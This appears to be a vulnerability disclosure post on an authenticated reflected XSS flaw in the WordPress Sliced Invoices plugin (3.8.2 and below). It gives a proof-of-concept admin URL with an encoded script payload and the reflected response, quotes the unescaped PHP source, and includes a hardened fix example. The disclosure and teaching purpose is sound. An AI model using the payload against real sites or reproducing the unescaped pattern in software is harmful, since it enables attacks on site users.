Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS

The WordPress Sliced Invoices plugin, version 3.8.2 and lower, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability.

Initial submission of the vulnerability

# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
The WordPress Sliced Invoices plugin, version 3.8.2 and lower, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using a WordPress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
	<p>Creation failed, could not find original invoice or quote: <script>alert(1)</script></p></body>
</html>
```

Detailed analysis of the vulnerability

In wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php, at line number 2236, we can observe the following unescaped output of user-supplied data:

```php
wp_die('Creation failed, could not find original invoice or quote: ' . $post_id);
```

Where the $post_id variable is assigned on line 2154 as:

```php
/*
 * get the original post id
 */
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
```

This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E where example.com is your target.

How to fix

Update to the latest available version of the Sliced Invoices plugin.
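As an added illustration (this is not the plugin's own code, nor its actual patch), the following standalone PHP script places the unescaped pattern described in the analysis next to a hardened version. Because a post ID can only be a non-negative integer, the hardened variant coerces the request value with `absint()` before using it and escapes the echoed value with `esc_html()`; the two shims at the top are assumptions that stand in for the real WordPress functions only when the file is run outside WordPress, and the request array is constructed to mirror the proof of concept above.

```php
<?php
// Added example, not the plugin's code. The shims below exist only so the
// script runs outside WordPress (php example.php); inside WordPress the real
// esc_html() and absint() are already defined and the shims are skipped.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($value) {
        return abs((int) $value);
    }
}

// Vulnerable pattern, as described in the analysis: the raw request value is
// concatenated straight into the message that wp_die() renders as HTML.
function build_error_vulnerable(array $get, array $post): string {
    $post_id = isset($get['post']) ? $get['post'] : ($post['post'] ?? '');
    return 'Creation failed, could not find original invoice or quote: ' . $post_id;
}

// Hardened pattern: coerce to a non-negative integer first, refuse to reflect
// anything that is not a valid ID, and escape the value that is echoed.
function build_error_hardened(array $get, array $post): string {
    $raw = isset($get['post']) ? $get['post'] : ($post['post'] ?? '');
    $post_id = absint($raw);
    if ($post_id === 0) {
        // Do not echo the attacker-controlled string at all.
        return 'Creation failed: missing or invalid invoice/quote ID.';
    }
    return 'Creation failed, could not find original invoice or quote: ' . esc_html($post_id);
}

// Constructed request mirroring the proof of concept above.
$request = ['post' => '<script>alert(1)</script>'];
echo build_error_vulnerable($request, []), PHP_EOL; // script tag reflected verbatim
echo build_error_hardened($request, []), PHP_EOL;   // generic message, nothing reflected
echo build_error_hardened(['post' => '42'], []), PHP_EOL; // "... quote: 42"
```

In the plugin, the string returned by the hardened function would be passed to `wp_die()` in place of the unescaped concatenation; the integer coercion removes the injection vector entirely, and the `esc_html()` call is a second line of defence should the ID ever become a non-numeric value again.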

This post is licensed under CC BY 4.0 by the author.